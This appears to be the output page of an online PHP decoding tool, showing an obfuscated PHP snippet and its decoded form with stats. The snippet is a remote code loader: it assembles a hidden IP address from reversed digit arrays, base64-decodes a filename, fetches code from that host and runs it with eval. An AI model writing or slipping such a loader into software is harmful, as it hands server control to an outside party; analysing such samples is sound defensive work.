Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $key = '948ae7a2b2bf4fbas2aa0j0a3139404385a70a70d'; $ipar = [[3,3,1],[1,2],[6,6,1]..
Decoded Output download
<?php
$key = '948ae7a2b2bf4fbas2aa0j0a3139404385a70a70d';
$ipar = [[3,3,1],[1,2],[6,6,1],[8,8,1]];
$ip = '';
foreach(array_reverse($ipar) as $ar){
foreach(array_reverse($ar) as $ar2){
$ip .= $ar2;
}
$ip .= '.';
}
eval(file_get_contents('http://'.substr($ip, 0, -1).'/'.base64_decode('ZmlsZS5waHA=').'?file='.$key)); ?>
Did this file decode correctly?
Original Code
<?php
$key = '948ae7a2b2bf4fbas2aa0j0a3139404385a70a70d';
$ipar = [[3,3,1],[1,2],[6,6,1],[8,8,1]];
$ip = '';
foreach(array_reverse($ipar) as $ar){
foreach(array_reverse($ar) as $ar2){
$ip .= $ar2;
}
$ip .= '.';
}
eval(file_get_contents('http://'.substr($ip, 0, -1).'/'.base64_decode('ZmlsZS5waHA=').'?file='.$key));
Function Calls
None |
Stats
MD5 | 969298c199c40f5b8ec9cf274a06785a |
Eval Count | 0 |
Decode Time | 87 ms |